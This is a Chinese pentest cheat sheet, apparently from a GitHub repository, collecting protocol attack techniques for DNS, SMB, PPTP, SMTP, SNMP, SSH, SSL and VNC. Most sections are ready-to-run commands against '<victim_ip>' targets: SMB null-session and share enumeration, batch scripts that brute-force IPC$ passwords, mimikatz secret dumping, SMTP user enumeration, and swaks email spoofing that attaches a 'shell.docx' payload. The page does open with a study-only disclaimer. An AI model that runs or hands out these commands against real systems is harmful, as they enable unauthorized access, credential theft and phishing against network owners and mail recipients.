Skip to content

Latest commit

 

History

History
699 lines (530 loc) · 24.5 KB

Protocol-Exploits.md

File metadata and controls

699 lines (530 loc) · 24.5 KB

Protocol - Exploits

注:本分类里内容并非全是协议的 bug,部分 "基于、使用" 这个协议的应用所存在的漏洞也算在其中,例如 dns 域传送漏洞,其并非 dns 协议本身的漏洞,为服务部署时的配置问题,但应用与 DNS 相关的业务,故此分类,特此说明


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


大纲


DNS

相关文章

笔记

子域接管漏洞

DNS Rebinding

CVE-1999-0532 dns 域传送漏洞

  • 文章

  • POC | Payload | exp

    dig @dns.xxx.edu.cn axfr xxx.edu.cn
    # @ 指定域名服务器;
    # axfr 为域传送指令;
    # xxx.edu.cn 表示要查询的域名;

ipv6

文章

工具


LDAP

概述

轻量级目录访问协议,是一种在线目录访问协议,主要用于目录中资源的搜索和查询,是 X.500 的一种简便的实现。

文章


RTSP

概述

实时流媒体协议(RTSP)是一种网络控制协议,设计用于娱乐和通信系统,以控制流媒体服务器。该协议用于建立和控制终端之间的媒体会话。媒体服务器的客户端发出 VHS 风格的命令,如播放、录制和暂停,以方便实时控制媒体流从服务器到客户端(视频点播)或从客户端到服务器(语音录制)。

流媒体数据的传输本身不是 RTSP 的任务。大多数 RTSP 服务器使用实时传输协议 (RTP) 与实时控制协议 (RTCP) 相结合来传输媒体流。

暴力破解


SMB

文章

信息收集

  • MSF 模块

    use auxiliary/scanner/smb/smb_version
    use exploit/multi/samba/usermap_script
  • nmblookup

    nmblookup -A <victim_ip>
  • ngrep

    "ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
    smbclient -L \\\\<victim_ip>"
  • nmap脚本

    nmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>

枚举用户

  • nmap脚本

    nmap --script smb-enum-users.nse -p 445 <目标IP>
  • rpcclient

    rpcclient -U '' <目标IP>
        querydominfo
        enumdomusers
        queryuser <用户名>
  • enum4linux

    enum4linux <目标IP>

获取共享

  • smbmap

    smbmap -H  <victim_ip> -R <sharename>
  • smbclient

    echo exit | smbclient -L \\\\$ip
    "smbclient \\\\<victim_ip>\\<share>"
    smbclient -L //<victim_ip> -N
  • nmap

    nmap --script smb-enum-shares -p139,445 -T4 -Pn <victim_ip>

空会话

  • smbmap

    smbmap -H <victim_ip>
  • rpcclient

    rpcclient -U "" -N $ip
  • smbclient

    smbclient //<victim_ip>/IPC$ -N
  • enum

    enum -s <victim_ip>
    enum -U <victim_ip>
    enum -P <victim_ip>
  • enum4linux

    enum4linux -a <victim_ip>

匿名共享

  • smbclient

    smbclient //$ip/share -U username
    smbclient \\\\<victim_ip>\\<share>
    smbclient //<victim_ip>/<share>
    smbclient //<victim_ip>/<share\ name>
    smbclient //<victim_ip>/<""share name"">
  • rpcclient

    rpcclient -U " " <victim_ip>
    rpcclient -U " " -N <victim_ip>

暴力破解

可以暴力破解来获得目标主机的 smb 访问。

hydra -L user.txt -P pass.txt 192.168.1.1 smb
  • IPC 爆破

    ip.txt 放入要爆破的 IP
    pass.txt 放入爆破的密码
    默认爆破用户:Administrator
    爆破成功的结果,会在 bat 运行的当前目录生成 out.txt
    爆破进度的查询:type log.txt,完成后当前目录生成 end.txt
    

    非空连接爆破.bat

    @echo off
    cls
    echo Useage: %0 ip.txt pass.txt
    for /f %%t in (%1) do (
    FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (%2) do (
    echo net use \\%%t\ipc$ "%%i" /user:"localhost\Administrator" >> log.txt
    net use \\%%t\ipc$ "%%i" /user:"localhost\Administrator"  >NUL 2>NUL
    IF NOT errorlevel 1 (
    echo %%i  t:%%t>> out.txt
    net use \\%%t\ipc$ /del
    )
    net use * /del /y >NUL 2>NUL
    )
    )
    echo end >> end.txt

    空连接爆破.bat

    @echo off
    cls
    echo Useage: %0 ip.txt
    for /f %%t in (%1) do (
    echo net use \\%%t\ipc$ "" /user:"localhost\Administrator" >> log.txt
    net use \\%%t\ipc$ "" /user:"localhost\Administrator"  >NUL 2>NUL
    IF NOT errorlevel 1 (
    echo success:%%t>> out.txt
    net use \\%%t\ipc$ /del
    )
    net use * /del /y >NUL 2>NUL
    )
    echo end >> end.txt

利用 NTLM 值破解 SMB

主要依靠钓鱼,不是很适合在实战中使用,内容见 https://www.hackingarticles.in/4-ways-capture-ntlm-hashes-network/


PPTP

文章

获得PPTP 口令

Windows系统拨号和宽带连接的配置信息存储在固定位置,路径如下: %APPDATA%\Microsoft\Network\Connections\Pbk\rasphone.pbk 查看该文件即可获得 PPTP 连接的配置信息,包括服务器 IP,不包含连接用户名和口令

mimikatz.exe privilege::debug token::elevate lsadump::secrets exit

windows 命令行下连接 PPTP VPN

rasdial "VPN Connection" username pass

# 关闭连接
rasphone -h "VPN Connection"

kali 连接 PPTP VPN

pptpsetup --create vpn --server xx.xx.xx.xx --username username --password pass --encrypt --start

# 将默认路由表修改为远程
route del default
route add default gw xx.xx.xx.xx

暴力破解 PPTP 口令


SMTP

概述

SMTP 为邮件协讫,默认端口 25.经常用来邮箱伪造,钓鱼攻击.

文章

邮件检测

枚举用户

MAIL FROM   : 指定发件人地址
RCPT TO : 指定单个的邮件接收人;可有多个 RCPT TO;常在 MAIL FROM命令之后
VRFY    : 用于验证指定的用户/邮箱是否存在;由于安全原因,服务器常禁止此命令
EXPN    : 验证给定的邮箱列表是否存在,也常被禁用
SMTP 返回码
500 	格式错误,命令不可识别(此错误也包括命令行过长)
501 	参数格式错误
502 	命令不可实现
503 	错误的命令序列
504 	命令参数不可实现
211 	系统状态或系统帮助响应
214 	帮助信息
220 	服务就绪
221 	服务关闭传输信道
421 	服务未就绪,关闭传输信道(当必须关闭时,此应答可以作为对任何命令的响应)
250 	要求的邮件操作完成
251 	用户非本地,将转发向
450 	要求的邮件操作未完成,邮箱不可用(例如,邮箱忙)
550 	要求的邮件操作未完成,邮箱不可用(例如,邮箱未找到,或不可访问)
451 	放弃要求的操作;处理过程中出错
551 	用户非本地,请尝试
452 	系统存储不足,要求的操作未执行
552 	过量的存储分配,要求的操作未执行
553 	邮箱名不可用,要求的操作未执行(例如邮箱格式错误)
354 	开始邮件输入,以.结束
554 	操作失败
535 	用户验证失败
235 	用户验证成功
334 	等待用户输入验证信息

可以通过 Telnet 连接,在未禁用上述 SMTP 命令的服务器上,使用上述命令手动枚举用户名.

$ telnet xxx.xxx.xxx.xxx 25
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
220 mxt.xxx.xxx.cn ESMTP Postfix
VRFY root
252 2.0.0 root
VRFY bin
252 2.0.0 bin
VRFY admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

$ telnet xxx.xxx.xxx.xxx 25
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
220 mxt.xxx.xxx.cn ESMTP Postfix
MAIL FROM:root
250 2.1.0 Ok
RCPT TO:root
250 2.1.5 Ok
RCPT TO:bin
250 2.1.5 Ok
RCPT TO:admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

可以看到两种方式均返回 root、bin 用户是存在的,admin 用户不存在.

  • smtp-user-enum - kali 自带

    smtp-user-enum -M VRFY -u root -t xxx.xxx.xxx.xxx
    smtp-user-enum -M RCPT -u bin -t xxx.xxx.xxx.xxx
    smtp-user-enum -M EXPN -u bin -t xxx.xxx.xxx.xxx
  • MSF 模块

    use auxiliary/scanner/smtp/smtp_enum
    set rhosts xxx.xxx.xxx.xxx
    run
  • smtp-enum-users - nmap 脚本

    nmap -p 25 --script smtp-enum-users.nse xxx.xxx.xxx.xxx

邮件伪造

  • 文章

  • 简单方法

    telnet xxx.xxx.xxx.xxx 25
    HELO xxxx.com   # 向邮件服务器提供连接的域名,也就是邮件将从哪台服务器发来.
    MAIL FROM:[email protected]  # 伪造管理员身份来发邮件
    RCPT TO:[email protected] # 验证邮件地址是否存在.如果查询的是一个真实的 Email 地址,邮件服务器就会返回250状态码.验证邮箱存在的话,还可以给这个接受者邮箱发送邮件.
    DATA    # 使用DATA命令来伪造邮箱内容,客户端告诉服务器自己准备发送邮件正文
    354 go ahead, end data with CRLF.CRLF   # 服务器返回354,表示自己已经作好接受邮件的准备
    "这是一个邮件伪造测试"  # 用英文状态的双引号来修饰正文,正文结束后,发送结束符.表明正文的结束.
    .
    QUIT
    
  • swaks

    Swaks 的全称是 Swiss Army Knife SMTP(SMTP 界的瑞士军刀),用于测试 SMTP 协议的各种操作.

    kali 自带

    swaks

    配合 https://support.smtp2go.com/hc/en-gb

    swaks --to 目标@qq.com --from [email protected]\
    --header-X-Mailer SMTP  --ehlo [email protected] --body 'test'\
    --server mail.smtp2go.com -p 2525 -au 账号 -ap 密码 \
    --attach /shell.docx --header "Subject:test" \
    --h-From: 'test<[email protected]>'

SNMP

文章

工具

snmp 弱口令


SSH

文章

工具

  • arthepsy/ssh-audit - SSH服务器审计(banner、密钥交换、加密、mac、压缩、兼容性、安全性等)

版本扫描

use auxiliary/fuzzers/ssh/ssh_version_2
set RHOSTS [ip]
run

libSSH

OpenSSH

OpenSSH(OpenBSD Secure Shell)是 OpenBSD 计划组的一套用于安全访问远程计算机的连接工具。该工具是 SSH 协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。


SSL

文章

工具

  • MassBleed - SSL 漏洞扫描器
  • sslscan - 测试启用SSL/TLS的服务,以发现支持的密码套件。
  • testssl - 在任何端口的任何地方测试 TLS/SSL 加密
  • coroner/cryptolyzer - 适用于 Python 2.7/3.4 以上的服务器加密(TLS/SSL)设置分析库

CVE-2014-3566 SSL 3.0 POODLE 攻击信息泄露漏洞

  • 简介

    SSL protocol 是美国网景(Netscape)公司研发的安全套接层协议(Secure Socket Layer)的缩写,为互联网通信提供安全及数据完整性保障。

    OpenSSL 1.0.1i 及之前版本中使用的 SSL protocol 3.0 版本中存在安全漏洞,该漏洞源于程序使用非确定性的 CBC 填充。攻击者可借助 padding-oracle 攻击利用该漏洞实施中间人攻击,获取明文数据。

  • 文章

  • POC | Payload | exp

  • MSF 模块

    use auxiliary/scanner/http/ssl_version
    

OpenSSL


UPNP

工具

CVE-2020-12695


VNC

文章

未授权访问漏洞

  • 概述

    VNC 是虚拟网络控制台 Virtual Network Console 的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司 AT&T 的欧洲研究实验室开发。VNC 是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制 target 主机。

  • vncviewer

    # kali 自带
    vncviewer [ip]
  • MSF 模块

    use auxiliary/scanner/vnc/vnc_none_auth
    set rhosts [ip]
    set threads 50
    run

暴力破解

  • MSF 模块
    use auxiliary/scanner/vnc/vnc_login
    set RHOSTS [ip]
    set RPORT [port]
    set pass_file /root/Desktop/pass.txt
    run

密码破解


Other

Ripple20

概述

国外安全研究人员在由 Treck 开发的 TCP/IP 协议栈中发现了多个漏洞,这一系列漏洞统称为 Ripple20。这些漏洞广泛存在于嵌入式和物联网设备中,影响了多个行业领域(包括医疗、运输、能源、电信、工业控制、零售和商业等),涉及了众多供应商(包括 HP、Schneider Electric、Intel、Rockwell Automation、Caterpillar、Baxter 等)。

这些漏洞源于 Ripple20 的多个协议(包括 IPv4、ICMPv4、IPv6、IPv6OverIPv4、TCP、UDP、ARP、DHCP、DNS 或以太网链路层)在处理网络报文发送时存在缺陷,其中包括四个严重漏洞,它们的 CVE 编号分别为 CVE-2020-11896、CVE-2020-11898、CVE-2020-11910、CVE-2020-11911。CVE-2020-11896(CVSS 评分 10)可导致远程执行代码,CVE-2020-11897(CVSS 评分 10)可导致越界写入,CVE-2020-11901(CVSS 评分 9)可导致远程执行代码,CVE-2020-11898(CVSS 评分 9.1)可导致泄露敏感信息。其它 15 个 Ripple20 漏洞的严重程度各异,CVSS 评分分别从 3.1 到 8.2。

相关文章

相关资源

POC | Payload | exp

AMNESIA33

概述

近期,国外安全研究人员在多个被广泛使用的开源 TCP/IP 协议栈发现了多个漏洞,这一系列漏洞统称为 AMNESIA33。这些漏洞广泛存在于嵌入式和物联网设备中,影响了多个行业领域(包括医疗、运输、能源、电信、工业控制、零售和商业等),目前已知范围内涉及了超 150 家供应商以及数以百万计的设备。与 URGEN11 和 Ripple20 不同的是,AMNESIA33 影响的是多个开源 TCP/IP 协议栈,因此这些漏洞可以悄无声息地影响到无数个代码库、开发团队与各个公司的产品。目前已知的漏洞涉及到了智能家居、工厂 PLC、SCADA 设备与工控交换机,电力监控等设备。

这些漏洞存在于 uIP、FNET、picoTCP 和 Nut/Net 等开源协议栈上,影响 TCP/IP 协议栈的多个组件,包括 DNS、IPv6、IPv4、TCP、ICMP、LLMNR 和 mDNS 等。其中包括多个严重漏洞,它们的 CVE 编号分别为 CVE-2020-17437、CVE-2020-17443、CVE-2020-24338、CVE-2020-24336、CVE-2020-25111。

CVE-2020-17437(CVSS 评分 8.2)、CVE-2020-17443(CVSS 评分 8.2)可导致设备拒绝服务。CVE-2020-24338、CVE-2020-24336、CVE-2020-25111(这三个 CVSS 评分均为 9.8)都可导致远程代码执行 (RCE)。其它 28 个漏洞的严重程度各异,CVSS 评分分别从 4 到 8.2。

由于 IoT、OT、IT 设备供应链的特性,漏洞影响的设备众多,影响范围广且持续时间长,漏洞修复的实施较困难。同时,由于 uIP、picoTCP 开源协议栈已经不再维护,所以部分漏洞没有补丁,很多产品只能寻找替代技术方案或者是增加防范措施。

相关文章